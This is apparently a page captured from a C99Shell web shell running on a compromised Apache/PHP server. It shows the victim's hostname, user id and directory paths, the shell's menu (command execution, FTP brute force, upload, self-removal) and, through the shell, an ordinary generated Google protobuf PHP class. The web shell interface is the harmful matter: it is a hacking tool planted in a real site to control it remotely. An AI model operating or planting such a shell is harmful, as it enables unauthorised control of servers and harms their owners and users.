!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/common-protos/src/Api/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SystemParameter.php (3.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/api/system_parameter.proto

namespace Google\Api;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * Define a parameter's name and location. The parameter may be passed as either
 * an HTTP header or a URL query parameter, and if both are passed the behavior
 * is implementation-dependent.
 *
 * Generated from protobuf message <code>google.api.SystemParameter</code>
 */
class SystemParameter extends \Google\Protobuf\Internal\Message
{
    
/**
     * Define the name of the parameter, such as "api_key" . It is case sensitive.
     *
     * Generated from protobuf field <code>string name = 1;</code>
     */
    
protected $name '';
    
/**
     * Define the HTTP header name to use for the parameter. It is case
     * insensitive.
     *
     * Generated from protobuf field <code>string http_header = 2;</code>
     */
    
protected $http_header '';
    
/**
     * Define the URL query parameter name to use for the parameter. It is case
     * sensitive.
     *
     * Generated from protobuf field <code>string url_query_parameter = 3;</code>
     */
    
protected $url_query_parameter '';

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type string $name
     *           Define the name of the parameter, such as "api_key" . It is case sensitive.
     *     @type string $http_header
     *           Define the HTTP header name to use for the parameter. It is case
     *           insensitive.
     *     @type string $url_query_parameter
     *           Define the URL query parameter name to use for the parameter. It is case
     *           sensitive.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Api\SystemParameter::initOnce();
        
parent::__construct($data);
    }

    
/**
     * Define the name of the parameter, such as "api_key" . It is case sensitive.
     *
     * Generated from protobuf field <code>string name = 1;</code>
     * @return string
     */
    
public function getName()
    {
        return 
$this->name;
    }

    
/**
     * Define the name of the parameter, such as "api_key" . It is case sensitive.
     *
     * Generated from protobuf field <code>string name = 1;</code>
     * @param string $var
     * @return $this
     */
    
public function setName($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->name $var;

        return 
$this;
    }

    
/**
     * Define the HTTP header name to use for the parameter. It is case
     * insensitive.
     *
     * Generated from protobuf field <code>string http_header = 2;</code>
     * @return string
     */
    
public function getHttpHeader()
    {
        return 
$this->http_header;
    }

    
/**
     * Define the HTTP header name to use for the parameter. It is case
     * insensitive.
     *
     * Generated from protobuf field <code>string http_header = 2;</code>
     * @param string $var
     * @return $this
     */
    
public function setHttpHeader($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->http_header $var;

        return 
$this;
    }

    
/**
     * Define the URL query parameter name to use for the parameter. It is case
     * sensitive.
     *
     * Generated from protobuf field <code>string url_query_parameter = 3;</code>
     * @return string
     */
    
public function getUrlQueryParameter()
    {
        return 
$this->url_query_parameter;
    }

    
/**
     * Define the URL query parameter name to use for the parameter. It is case
     * sensitive.
     *
     * Generated from protobuf field <code>string url_query_parameter = 3;</code>
     * @param string $var
     * @return $this
     */
    
public function setUrlQueryParameter($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->url_query_parameter $var;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--